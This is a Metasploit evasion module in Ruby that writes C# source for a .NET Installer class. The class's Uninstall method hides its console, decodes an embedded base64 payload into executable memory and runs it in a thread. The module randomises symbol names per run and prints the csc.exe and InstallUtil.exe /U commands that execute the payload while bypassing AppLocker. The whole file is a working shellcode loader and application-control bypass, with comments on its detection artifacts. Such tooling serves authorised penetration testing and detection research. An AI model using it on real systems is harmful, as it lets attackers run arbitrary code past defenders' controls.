GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/evasion/windows/applocker_evasion_install_util.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Evasion module that wraps the selected payload in C# source for a
# System.Configuration.Install.Installer subclass. The payload is run from the
# Installer's Uninstall override, which is why the printed instructions invoke
# InstallUtil.exe with /U rather than running the compiled assembly directly.
# The module itself only writes a .txt source file and prints instructions;
# compilation and execution happen on the target, not here.
class MetasploitModule < Msf::Evasion
  # Sets module metadata and registers the single FILENAME option.
  #
  # @param info [Hash] module info supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Applocker Evasion - .NET Framework Installation Utility',
        'Description' => %q{
          This module will assist you in evading Microsoft Windows
          Applocker and Software Restriction Policies.
          This technique utilises the Microsoft signed binary
          InstallUtil.exe to execute user supplied code.
        },
        'Author' => [
          'Nick Tyrer <@NickTyrer>', # module development
          'Casey Smith' # install_util bypass research
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => [ARCH_X86, ARCH_X64],
        'Targets' => [['Microsoft Windows', {}]],
        'References' => [['URL', 'https://attack.mitre.org/techniques/T1118/']]
      )
    )

    register_options(
      [
        # Only the .txt source name is configurable; the .exe name shown in
        # the instructions is derived from it by string replacement.
        OptString.new('FILENAME', [true, 'Filename for the evasive file (default: install_util.txt)', 'install_util.txt'])
      ]
    )
  end

  # @return [String] the encoded payload as base64 text; it is embedded
  #   verbatim in the generated C# and decoded there by Convert.FromBase64String
  def build_payload
    Rex::Text.encode_base64(payload.encoded)
  end

  # @return [String] a new random 8-character alphabetic identifier; each call
  #   draws independently, so repeated calls give different C# symbol names
  def obfu
    Rex::Text.rand_text_alpha 8
  end

  # Builds the C# source text that is written to FILENAME.
  #
  # Generated structure: a namespace (mod[12]) holding an empty Main() class
  # (mod[11]) so the file compiles as an executable, plus an Installer subclass
  # (mod[10]) tagged [RunInstaller(true)]. Its Uninstall override calls
  # ShowWindow(GetConsoleWindow(), 0) (nCmdShow 0 is SW_HIDE), base64-decodes
  # the embedded payload into a byte array, copies it into memory obtained from
  # VirtualAlloc with type 0x1000 (MEM_COMMIT) and protection 0x40
  # (PAGE_EXECUTE_READWRITE), starts a thread at that address and waits on it
  # with 0xFFFFFFFF (INFINITE). The RWX allocation and the InstallUtil /U
  # invocation of a non-installer assembly are the observable artifacts a
  # detection engineer would key on. All identifiers are taken from obfu so
  # the emitted source differs per run; the literal C# below is intentionally
  # not indented relative to itself, and the squiggly heredoc strips the
  # common leading whitespace, so emitted lines start at column 0.
  #
  # @return [String] C# source containing the base64 payload
  def install_util
    esc = build_payload
    # 13 independent random names, indexed below by position.
    mod = [obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu]
    <<~HEREDOC
      using System;
      namespace #{mod[12]}
      {
      public class #{mod[11]} { public static void Main() { } }
      [System.ComponentModel.RunInstaller(true)]
      public class #{mod[10]} : System.Configuration.Install.Installer
      {
      private static Int32 #{mod[0]}=0x1000;
      private static IntPtr #{mod[1]}=(IntPtr)0x40;
      private static UInt32 #{mod[2]} = 0xFFFFFFFF;
      [System.Runtime.InteropServices.DllImport("kernel32")]
      private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);
      [System.Runtime.InteropServices.DllImport("kernel32")]
      private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);
      [System.Runtime.InteropServices.DllImport("kernel32")]
      private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);
      [System.Runtime.InteropServices.DllImport("user32.dll")]
      static extern bool ShowWindow(IntPtr #{mod[3]}, int nCmdShow);
      [System.Runtime.InteropServices.DllImport("Kernel32")]
      private static extern IntPtr GetConsoleWindow();
      const int #{mod[4]} = 0;
      public override void Uninstall(System.Collections.IDictionary s)
      {
      IntPtr #{mod[3]};
      #{mod[3]} = GetConsoleWindow();
      ShowWindow(#{mod[3]}, #{mod[4]});
      string #{mod[5]} = "#{esc}";
      byte[] #{mod[6]} = Convert.FromBase64String(#{mod[5]});
      byte[] #{mod[7]} = #{mod[6]};
      IntPtr #{mod[8]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{mod[7]}.Length, #{mod[0]}, #{mod[1]});
      System.Runtime.InteropServices.Marshal.Copy(#{mod[7]}, 0, #{mod[8]}, #{mod[7]}.Length);
      IntPtr #{mod[9]} = IntPtr.Zero;
      WaitForSingleObject(CreateThread(#{mod[9]}, UIntPtr.Zero, #{mod[8]}, #{mod[9]}, 0, ref #{mod[9]}), #{mod[2]});
      }
      }
      }
    HEREDOC
  end

  # Combined getter/setter consulted by the file-creation mixin: with no
  # argument (or '') it returns the stored name; with a name it stores and
  # returns it.
  #
  # @param name [String] filename to store; empty string means "read only"
  # @return [String, nil] the current filename (nil until one has been set)
  def file_format_filename(name = '')
    name.empty? ? @fname : @fname = name
  end

  # Writes the generated C# source to disk under the normalised filename.
  #
  # Falls back to install_util.txt when FILENAME is blank and appends '.txt'
  # when the name does not already end with it (case-insensitive). Note that
  # `<<` appends in place: when the datastore value is used, the same String
  # object is modified, and instructions below reads datastore['FILENAME']
  # rather than @fname — presumably relying on that in-place change; verify
  # against the datastore implementation before changing either method.
  def create_files
    f1 = datastore['FILENAME'].empty? ? 'install_util.txt' : datastore['FILENAME']
    f1 << '.txt' unless f1.downcase.end_with?('.txt')
    file1 = install_util
    file_format_filename(f1)
    file_create(file1)
  end

  # Prints the compile and run steps for the operator.
  #
  # The Framework vs Framework64 directory is chosen from the payload's first
  # architecture. The .exe name is produced with gsub, which replaces every
  # '.txt' occurrence in the name, not only a trailing extension.
  def instructions
    print_status "Copy #{datastore['FILENAME']} to the target"
    if payload.arch.first == ARCH_X86
      print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\csc.exe /out:#{datastore['FILENAME'].gsub('.txt', '.exe')} #{datastore['FILENAME']}"
      print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U #{datastore['FILENAME'].gsub('.txt', '.exe')}"
    else
      print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\csc.exe /out:#{datastore['FILENAME'].gsub('.txt', '.exe')} #{datastore['FILENAME']}"
      print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U #{datastore['FILENAME'].gsub('.txt', '.exe')}"
    end
  end

  # Module entry point: generate the source file, then print the usage steps.
  def run
    create_files
    instructions
  end
end